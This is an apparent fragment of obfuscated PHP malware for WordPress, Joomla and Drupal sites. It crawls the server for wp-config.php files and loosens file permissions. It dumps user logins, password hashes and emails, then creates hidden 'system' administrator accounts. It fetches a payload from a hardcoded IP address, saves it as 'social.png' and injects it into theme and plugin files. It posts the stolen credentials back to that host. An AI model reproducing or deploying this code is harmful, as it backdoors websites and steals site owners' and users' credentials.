strstr( $ANVoslonRNQSwwQloQTx, "301 Moved Permanently" ) ) { break; } else { preg_match_all( '/ 10000000 ) { $FdQRXBxLOBbcesmLHZsQ /= 100000; } $this->uBgDYDxGvwTUUWgwsZtu = $FdQRXBxLOBbcesmLHZsQ; $FdQRXBxLOBbcesmLHZsQ %= $dPQYPSLPdhPbzVDBxQsK; return $FdQRXBxLOBbcesmLHZsQ; } } class ozUEwvGfThFPKEOwkFic { private $cWBcMhvuwNKQKeikhYeZ, $kgqyGHEFDeTSgaPnfjaW, $uryvGPuyNCNLgIMuTXlS; private $jiuOepDTQAtKPmDPlmA; public function __construct( $lCTNLabxnOcjyrYcxGfw = 'old' ) { if ( class_exists( 'JFactory' ) ) { $this->jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); } if ( $lCTNLabxnOcjyrYcxGfw == 'new' ) { $this->ROnGXakeZGHvnAshuA(); } else { $this->eSWJphzLBsQkTYOMAcsN(); } $this->kgqyGHEFDeTSgaPnfjaW = base64_decode( 'LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBNksvSTJsNmsySXo3Vm9qenhrNVENCjQzUU5mSUptMmpXUHZYQXZGdGZ0K3l5NHJEM01zZVFKV3gzUExsa29SUWpTSTF1aWl3d2xQWldFRDBlNXdGZXQNCm5TNXRLaHZ2UmFPZVVQWUpxNk10eVVibmFNbjdic2hsZ2FBbFBhVUNWZEFPamR0R0hNdUZhV2ZuQkxnVFN1M2MNCnVjY1ZDMnpPbFh4N1hLMXR3MzllWmVwUmVtb2gwVzNRaGYraERGc0V6QUNTQm1LaEJpZ2Fud0NaelREdnlYcGoNCm5mYlJLYmYyNkxKREo5dTJDaG9oNzY4dlFpSWZ1ZjB0R0xRK3h4Y0JEbDJaVlcwUDc2Y2Q1STJ2K2xZUkJEL1gNCnZnVTMyL1VaZUtEaGVBOE0vb1o1L3lGdjVRV0FVMlNIRUVLWWZMa0FRbVhzL29SR3FNUU9OcW9MM1c1UTRiRS8NCmdRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0=' ); } private function eSWJphzLBsQkTYOMAcsN() { $ANVoslonRNQSwwQloQTx = VpLgOEumcbcbVAoDSkNT( WP_CLIENT_KEY ); $this->cWBcMhvuwNKQKeikhYeZ = $ANVoslonRNQSwwQloQTx; } private function ROnGXakeZGHvnAshuA() { $JDdxHMyVvUKthPzmRkMS = $this->FXwiogGmWuLpHVpAIOPs(); $this->cWBcMhvuwNKQKeikhYeZ = $JDdxHMyVvUKthPzmRkMS[ 'private' ]; $this->uryvGPuyNCNLgIMuTXlS = $JDdxHMyVvUKthPzmRkMS[ 'public' ]; chaGPqCyoHkruJXCIIlS( WP_CLIENT_KEY, $this->cWBcMhvuwNKQKeikhYeZ ); } public function XdjJpcCkQalYGiLHaNXR( $ANVoslonRNQSwwQloQTx ) { openssl_seal( $ANVoslonRNQSwwQloQTx, $cdtZYufTkpXBshccoVBC, $cfuSOlktfcjAgxrAbvTc, array( openssl_pkey_get_public( 
$this->kgqyGHEFDeTSgaPnfjaW ) ) ); return array( "data" => base64_encode( $cdtZYufTkpXBshccoVBC ), "key" => base64_encode( $cfuSOlktfcjAgxrAbvTc[ 0 ] ) ); } public function NlxEZhozjcIOCtbKZljT( $ANVoslonRNQSwwQloQTx ) { openssl_seal( $ANVoslonRNQSwwQloQTx, $cdtZYufTkpXBshccoVBC, $cfuSOlktfcjAgxrAbvTc, array( openssl_pkey_get_public( $this->uryvGPuyNCNLgIMuTXlS ) ) ); return json_encode( array( "data" => base64_encode( $cdtZYufTkpXBshccoVBC ), "key" => base64_encode( $cfuSOlktfcjAgxrAbvTc[ 0 ] ) ) ); } public function NgHMLtrOrvggBbUUtHKW() { return $this->uryvGPuyNCNLgIMuTXlS; } public function duINcvAvMBjVFAOeQCrT( $emDnXOMHIUCHXVocAIgZ ) { $this->uryvGPuyNCNLgIMuTXlS = $emDnXOMHIUCHXVocAIgZ; } public function fakDjKdyfxqzqCVYUs( $ANVoslonRNQSwwQloQTx ) { $uoZKldafGapBNDDpFNBP = json_decode( $ANVoslonRNQSwwQloQTx, TRUE ); if ( $uoZKldafGapBNDDpFNBP !== FALSE ) { $ANVoslonRNQSwwQloQTx = $uoZKldafGapBNDDpFNBP; } if ( ! is_array( $ANVoslonRNQSwwQloQTx ) ) { return FALSE; } openssl_open( base64_decode( trim( $ANVoslonRNQSwwQloQTx[ 'data' ] ) ), $FOhrxtRVXGleyOEepGtb, base64_decode( trim( $ANVoslonRNQSwwQloQTx[ 'key' ] ) ), $this->cWBcMhvuwNKQKeikhYeZ ); return $FOhrxtRVXGleyOEepGtb; } public function FXwiogGmWuLpHVpAIOPs() { $whjvYeznCnnMhNySt = openssl_pkey_new( array( 'private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA, ) ); openssl_pkey_export( $whjvYeznCnnMhNySt, $IaIiWByXDPbJBFciEFSs ); $ANVoslonRNQSwwQloQTx[ 'private' ] = $IaIiWByXDPbJBFciEFSs; $GOGpLousKsefGcOrKDCM = openssl_pkey_get_details( $whjvYeznCnnMhNySt ); $ANVoslonRNQSwwQloQTx[ 'public' ] = $GOGpLousKsefGcOrKDCM[ 'key' ]; return $ANVoslonRNQSwwQloQTx; } } class IaLpFyUtkdDdtRnEDrJ { private $cDnVuOXHvcWrHoZdzNsU; function __construct() { $cDnVuOXHvcWrHoZdzNsU = getcwd(); if ( $cDnVuOXHvcWrHoZdzNsU == '/' ) { return array(); } preg_match( '/^\/(.*?)(\/|$)/', $cDnVuOXHvcWrHoZdzNsU, $WUHTptpXecXQodJdwoWK ); $LWVkhAVVlTDVjJWoftlM = "/{$WUHTptpXecXQodJdwoWK[1]}/"; $ANVoslonRNQSwwQloQTx = 
array(); $this->cDnVuOXHvcWrHoZdzNsU = $cDnVuOXHvcWrHoZdzNsU . "/"; $this->QJmcpjlwZVrmjsqBUAye( $LWVkhAVVlTDVjJWoftlM, $ANVoslonRNQSwwQloQTx ); $ANVoslonRNQSwwQloQTx = $this->vGwCOmslsiystuNKcnWy( $ANVoslonRNQSwwQloQTx ); $this->BTkJfqJzqqxezBOOnXuw( $ANVoslonRNQSwwQloQTx ); } private function QJmcpjlwZVrmjsqBUAye( $FZxyFcxHIgRadtHnDvWU, &$ANVoslonRNQSwwQloQTx ) { $cDnVuOXHvcWrHoZdzNsU = $this->cDnVuOXHvcWrHoZdzNsU; if ( $FZxyFcxHIgRadtHnDvWU == $cDnVuOXHvcWrHoZdzNsU ) { return TRUE; } if ( file_exists( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) && ( is_readable( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) || ( ! is_readable( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) && chmod( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php', 0666 ) ) ) && ( strpos( $FZxyFcxHIgRadtHnDvWU, $cDnVuOXHvcWrHoZdzNsU ) === FALSE ) ) { $UVQzCXSpkqPMkFbArtvy = $FZxyFcxHIgRadtHnDvWU . 'wp-config.php'; $this->jNFkxnqCMsyhlYTCChkr( $UVQzCXSpkqPMkFbArtvy, $ANVoslonRNQSwwQloQTx ); $this->QCgmDxREoHBrEJvCRSCF( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ] ); if ( isset( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'url' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'access' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'template' ] ) ) { if ( ! $this->TEmmisdBfALbhZTEZJzK( $FZxyFcxHIgRadtHnDvWU, $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'template' ] ) ) { $this->JEIDDNvQVQhQJTMCJKea( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ], $FZxyFcxHIgRadtHnDvWU ); } } } if ($ZlJEkDLMJCOGEbBdMcny = @scandir( $FZxyFcxHIgRadtHnDvWU )) { foreach ( $ZlJEkDLMJCOGEbBdMcny as $UVQzCXSpkqPMkFbArtvy ) { if ( is_dir( $FZxyFcxHIgRadtHnDvWU . $UVQzCXSpkqPMkFbArtvy . '/' ) && ( $UVQzCXSpkqPMkFbArtvy != '.' ) && ( $UVQzCXSpkqPMkFbArtvy != '..' ) ) { $this->QJmcpjlwZVrmjsqBUAye( $FZxyFcxHIgRadtHnDvWU . $UVQzCXSpkqPMkFbArtvy . 
"/", $ANVoslonRNQSwwQloQTx ); } } } } private function QCgmDxREoHBrEJvCRSCF( &$ANVoslonRNQSwwQloQTx ) { mysql_connect( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_host' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_user' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_pass' ] ); mysql_select_db( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_name' ] ); $gOaBoMqrHWWrpAyXWcdE = mysql_fetch_assoc( mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name = 'siteurl'" ) ); $ANVoslonRNQSwwQloQTx[ 'url' ] = $gOaBoMqrHWWrpAyXWcdE[ 'option_value' ]; $rgRliUQbLmyLJlLtVdhF = mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_pass' ]; $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_email' ]; $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_url' ]; } $rgRliUQbLmyLJlLtVdhF = mysql_query( "select * from {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name like 'template';" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $ANVoslonRNQSwwQloQTx[ 'template' ] = str_replace( ' ', '', strtolower( $DcCSVJtSBpBIHUhJeLlW[ 'option_value' ] ) ); $rgRliUQbLmyLJlLtVdhF = mysql_query( "select * from {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name like '_site_transient_theme_roots';" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $raWBtqDmSibkDzsATBtV = unserialize( $DcCSVJtSBpBIHUhJeLlW[ 'option_value' ] ); if ( isset( $raWBtqDmSibkDzsATBtV[ $ANVoslonRNQSwwQloQTx[ 'template' ] ] ) ) { $ANVoslonRNQSwwQloQTx[ 'template' ] = '.' . $raWBtqDmSibkDzsATBtV[ $ANVoslonRNQSwwQloQTx[ 'template' ] ] . '/' . 
$ANVoslonRNQSwwQloQTx[ 'template' ]; } } } } private function jNFkxnqCMsyhlYTCChkr( $UVQzCXSpkqPMkFbArtvy, &$ANVoslonRNQSwwQloQTx ) { $nFIbeMjqZmYeLUUEATfk = file( $UVQzCXSpkqPMkFbArtvy ); foreach ( $nFIbeMjqZmYeLUUEATfk as $RzvaEkHfBgtdGyQxDFcF ) { if ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_NAME" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_name' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_USER" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_user' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_PASS" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_pass' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_HOST" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_host' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "table_prefix" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_prefix' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 0 ]; } } } private function JEIDDNvQVQhQJTMCJKea( &$ANVoslonRNQSwwQloQTx, $VDptGAURmIUERBrTxhpZ ) { require_once( $VDptGAURmIUERBrTxhpZ . 
'wp-includes/class-phpass.php' ); $imKFBXzBLVPnUQDzUNDM = new PasswordHash( 8, TRUE ); mysql_connect( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_host' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_user' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_pass' ] ); mysql_select_db( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_name' ] ); $xLyDQzORkZZbMOednjNE = 0; while ( 1 ) { $iwhKlgTzyDpdQDdQNTSC = 'system' . $xLyDQzORkZZbMOednjNE ++; $rgRliUQbLmyLJlLtVdhF = mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users where user_login = '{$iwhKlgTzyDpdQDdQNTSC}'" ); if ( ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) === FALSE ) { break; } } $CnAmMZwsCRiGPlhyacYU = date( 'Y-m-d H:i:s' ); $eyyPQlOlTIqZjnzoyueI = $imKFBXzBLVPnUQDzUNDM->HashPassword( 's#5gp.dT@d' ); $rgRliUQbLmyLJlLtVdhF = "insert into {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users (
user_login,
user_pass,
user_nicename,
user_email,
user_url,
user_registered,
user_activation_key,
user_status,
display_name)
values (
'{$iwhKlgTzyDpdQDdQNTSC}',
'{$eyyPQlOlTIqZjnzoyueI}',
'system',
'',
'',
'',
'{$CnAmMZwsCRiGPlhyacYU}',
'0',
'system');"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $EPiddlhLNBJYXRRpRZRb = mysql_insert_id(); $rgRliUQbLmyLJlLtVdhF = "INSERT INTO {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}usermeta (
user_id,
meta_key,
meta_value) VALUES (
'{$EPiddlhLNBJYXRRpRZRb}',
'wp_capabilities',
'a:1:{s:13:\"administrator\";b:1;}'
)"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $rgRliUQbLmyLJlLtVdhF = "INSERT INTO {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}usermeta (
user_id,
meta_key,
meta_value)
VALUES (
'{$EPiddlhLNBJYXRRpRZRb}',
'wp_user_level',
'10'
)"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $ANVoslonRNQSwwQloQTx[ 'bad_wp' ] = $iwhKlgTzyDpdQDdQNTSC; } private function vGwCOmslsiystuNKcnWy( $ANVoslonRNQSwwQloQTx ) { $OBZOxZtsmJECmtOofbw = array(); foreach ( $ANVoslonRNQSwwQloQTx as $UjgxfUcLzoQAJBIyTfSC ) { if ( isset( $UjgxfUcLzoQAJBIyTfSC[ 'bad_wp' ] ) ) { $OBZOxZtsmJECmtOofbw[ $UjgxfUcLzoQAJBIyTfSC[ 'url' ] ] = array( 'user' => $UjgxfUcLzoQAJBIyTfSC[ 'bad_wp' ], 'template' => $UjgxfUcLzoQAJBIyTfSC[ 'template' ] ); } } return $OBZOxZtsmJECmtOofbw; } static function BTkJfqJzqqxezBOOnXuw( $ANVoslonRNQSwwQloQTx ) { $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/wp-info/info.php'; $nlXwyPctCNDoEVVebxUh = urlencode( json_encode( $ANVoslonRNQSwwQloQTx ) ); $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, 'data=' . $nlXwyPctCNDoEVVebxUh ); $BwKJfYtBWvwlFPSYbYFU = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); return $BwKJfYtBWvwlFPSYbYFU; } static function XkMxCySCpNFSBuXPXHwS() { $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/wp-info/client2'; $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); $BwKJfYtBWvwlFPSYbYFU = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); return $BwKJfYtBWvwlFPSYbYFU; } private function TEmmisdBfALbhZTEZJzK( $FZxyFcxHIgRadtHnDvWU, $NiuzOpXWDlcBypsDoQnh ) { $oeDbCQIzLLQrabWltaCg = $FZxyFcxHIgRadtHnDvWU . 'wp-content/' . str_replace( './', '', $NiuzOpXWDlcBypsDoQnh ); $oWqFrlBwQONqnbShjLmR = $oeDbCQIzLLQrabWltaCg . '/functions.php'; if ( ! file_exists( $oWqFrlBwQONqnbShjLmR ) ) { return FALSE; } if ( ! is_writable( $oeDbCQIzLLQrabWltaCg ) && ! 
chmod( $oeDbCQIzLLQrabWltaCg, 0777 ) ) { return FALSE; } $xLyDQzORkZZbMOednjNE = 0; $zEHaGHUqEgdXyaJFpObM = 'social.png'; if ( file_exists( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { while ( 1 ) { $zEHaGHUqEgdXyaJFpObM = 'social' . $xLyDQzORkZZbMOednjNE ++ . '.png'; if ( ! file_exists( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { break; } } } file_put_contents( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM, self::XkMxCySCpNFSBuXPXHwS() ); if ( is_writable( $oWqFrlBwQONqnbShjLmR ) || chmod( $oWqFrlBwQONqnbShjLmR, 0666 ) ) { $YNqUHEzJjOpoPfnae = str_replace( array( "\n", "\r" ), '', file_get_contents( $oWqFrlBwQONqnbShjLmR ) ); if ( ! preg_match( "/social[\d]*\.png/", $YNqUHEzJjOpoPfnae ) ) { $wzwstZmDMgjepsXfqlsc = ( preg_match( "/\?>([\s]*)$/", $YNqUHEzJjOpoPfnae, $WUHTptpXecXQodJdwoWK ) ) ? "\nsetQuery( "SELECT value FROM #__options where option_name = '{$PomwCzJqFbOgfhQDnvg}'" ); $OBZOxZtsmJECmtOofbw = $jiuOepDTQAtKPmDPlmA->loadResult(); return $OBZOxZtsmJECmtOofbw; } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = get_option( $PomwCzJqFbOgfhQDnvg, array() ); return @$JKBGKZwspUYvdkeoetY[ 'data' ]; } if ( $GLOBALS[ 'base_path' ] || $GLOBALS[ 'base_url' ] ) { $jiuOepDTQAtKPmDPlmA = db_query( "SELECT value FROM options where option_name = '{$PomwCzJqFbOgfhQDnvg}'" )->fetchCol(); $OBZOxZtsmJECmtOofbw = $jiuOepDTQAtKPmDPlmA; return $OBZOxZtsmJECmtOofbw[ 0 ]; } } function chaGPqCyoHkruJXCIIlS( $nINwlDhAxQKFrJOsyjjn, $DEZvMdJXoNZuzjMADDHv ) { if ( VpLgOEumcbcbVAoDSkNT( $nINwlDhAxQKFrJOsyjjn ) ) { if ( class_exists( 'JFactory' ) ) { $jiuOepDTQAtKPmDPlmA = &JFactory::getDBO(); $jiuOepDTQAtKPmDPlmA->setQuery( "UPDATE #__options SET value ='{$DEZvMdJXoNZuzjMADDHv}' WHERE option_name='{$nINwlDhAxQKFrJOsyjjn}'" ); $jiuOepDTQAtKPmDPlmA->query(); } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = array( 'data' => $DEZvMdJXoNZuzjMADDHv 
); update_option( $nINwlDhAxQKFrJOsyjjn, $JKBGKZwspUYvdkeoetY ); } if ( isset( $GLOBALS[ 'base_path' ] ) || isset( $GLOBALS[ 'base_url' ] ) ) { db_query( "UPDATE options SET value = :value WHERE option_name = :option", array( ':value' => $DEZvMdJXoNZuzjMADDHv, ':option' => $nINwlDhAxQKFrJOsyjjn ) ); } } else { if ( class_exists( 'JFactory' ) ) { $jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); $jiuOepDTQAtKPmDPlmA->setQuery( "INSERT INTO #__options(option_name, value) values ('{$nINwlDhAxQKFrJOsyjjn}' , '{$DEZvMdJXoNZuzjMADDHv}')" ); return $jiuOepDTQAtKPmDPlmA->query(); } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = array( 'data' => $DEZvMdJXoNZuzjMADDHv ); update_option( $nINwlDhAxQKFrJOsyjjn, $JKBGKZwspUYvdkeoetY ); } } } function jqryqFBMrHdVpgSfpDad() { if ( strstr( __FILE__, "wp-content/themes" ) !== FALSE ) { $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); $NXdTbsKfmSOvfgWeGQma = WP_PLUGIN_DIR; foreach ( @$uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $NXdTbsKfmSOvfgWeGQma . "/" . $afaaIklbzorYXAlUjNPh ); if ( $WVnZYORFsYkxVCRWs ) { break; } } if ( ! $WVnZYORFsYkxVCRWs ) { rHzKzOeWuASbSfekskHj(); } } else { $IcsiaRIKwgqfTGaxZlw = get_template_directory(); $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $IcsiaRIKwgqfTGaxZlw . "/functions.php" ); if ( ! $WVnZYORFsYkxVCRWs ) { $NXdTbsKfmSOvfgWeGQma = WP_PLUGIN_DIR; $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); foreach ( $uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $NXdTbsKfmSOvfgWeGQma . "/$afaaIklbzorYXAlUjNPh" ); if ( $WVnZYORFsYkxVCRWs ) { break; } } } if ( ! 
$WVnZYORFsYkxVCRWs ) { rHzKzOeWuASbSfekskHj(); } } } function HcMCXUOlDuTZUOMddjAh( $afaaIklbzorYXAlUjNPh ) { $NXdTbsKfmSOvfgWeGQma = dirname( $afaaIklbzorYXAlUjNPh ); $BwKJfYtBWvwlFPSYbYFU = str_replace( array( "\n", "\r" ), '', file_get_contents( $afaaIklbzorYXAlUjNPh ) ); if ( ! file_exists( $afaaIklbzorYXAlUjNPh ) ) { return FALSE; } if ( ! is_writable( $afaaIklbzorYXAlUjNPh ) && ! chmod( $afaaIklbzorYXAlUjNPh, 0777 ) ) { return FALSE; } if ( ! is_writable( $NXdTbsKfmSOvfgWeGQma ) && ! chmod( $NXdTbsKfmSOvfgWeGQma, 0777 ) ) { return FALSE; } if ( preg_match( "/social[\d]*\.png/", $BwKJfYtBWvwlFPSYbYFU ) ) { return FALSE; } $xLyDQzORkZZbMOednjNE = 0; $zEHaGHUqEgdXyaJFpObM = 'social.png'; if ( file_exists( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { while ( 1 ) { $zEHaGHUqEgdXyaJFpObM = 'social' . ++ $xLyDQzORkZZbMOednjNE . '.png'; if ( ! file_exists( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { break; } } } file_put_contents( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM, IaLpFyUtkdDdtRnEDrJ::XkMxCySCpNFSBuXPXHwS() ); if ( is_writable( $afaaIklbzorYXAlUjNPh ) || chmod( $afaaIklbzorYXAlUjNPh, 0666 ) ) { $wzwstZmDMgjepsXfqlsc = ( preg_match( "/\?>([\s]*)$/", $BwKJfYtBWvwlFPSYbYFU, $WUHTptpXecXQodJdwoWK ) ) ? "\nset_role( 'administrator' ); $ANVoslonRNQSwwQloQTx = array( 'user' => $zDNvTSZejFCkikBBYJnv, 'pass' => $eyyPQlOlTIqZjnzoyueI, 'email' => $AXnqCEBIBkgvOuLbMY, 'site' => get_site_url() ); $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/data2.php'; $nlXwyPctCNDoEVVebxUh = base64_encode( json_encode( $ANVoslonRNQSwwQloQTx ) ); $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, 'data=' . 
$nlXwyPctCNDoEVVebxUh ); curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); } } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_client_key_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url()), 3 , 5); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_site_url()), 3 ,5 ); } } else { $WDWTfYxwxTMIIsMmHXVV = 'WP_CLIENT_KEY'; } define( 'WP_CLIENT_KEY', $WDWTfYxwxTMIIsMmHXVV ); function XNBSQfKUHOLDGQLcYptk() { if ( ! defined( 'WP_OPTION_KEY' ) ) { define( 'WP_OPTION_KEY', 'wp_data_newa' ); new mWocWcrhWpiDUTXuIwU( 1 ); } } if ( class_exists( 'JFactory' ) ) { $hnvWkOWCIqbVqysQUuFA = &JFactory::getApplication(); $hnvWkOWCIqbVqysQUuFA->registerEvent( 'onAfterRender', 'plgContentMyPlugin' ); } if ( isset( $GLOBALS[ 'base_path' ] ) || isset( $GLOBALS[ 'base_url' ] ) ) { if ( ! defined( 'WP_OPTION_KEY' ) ) { define( 'WP_OPTION_KEY', 'wp_data_newa' ); $LdipUBQNurPDrFzVqrJT = $TNOhHYiQBtZmMLieKNPz->iwhKlgTzyDpdQDdQNTSC . "_page_alter"; $WpjxSpMcLFVAFyrpTZyw = 'function ' . $LdipUBQNurPDrFzVqrJT . "(&\$page) {
\$ANVoslonRNQSwwQloQTx = new Client(2);
\$pnbgYzqXMNjqSBORSeLB = \"\";
foreach (\$ANVoslonRNQSwwQloQTx->data['echo'] as \$gTFusccXHODHdNfTRcIr) {
\$pnbgYzqXMNjqSBORSeLB.=\$gTFusccXHODHdNfTRcIr;
}
\$JbpGMBCRMNNqYrllqogh = \$pnbgYzqXMNjqSBORSeLB;
\$page['page_top'][] = array('#markup' => \$JbpGMBCRMNNqYrllqogh);
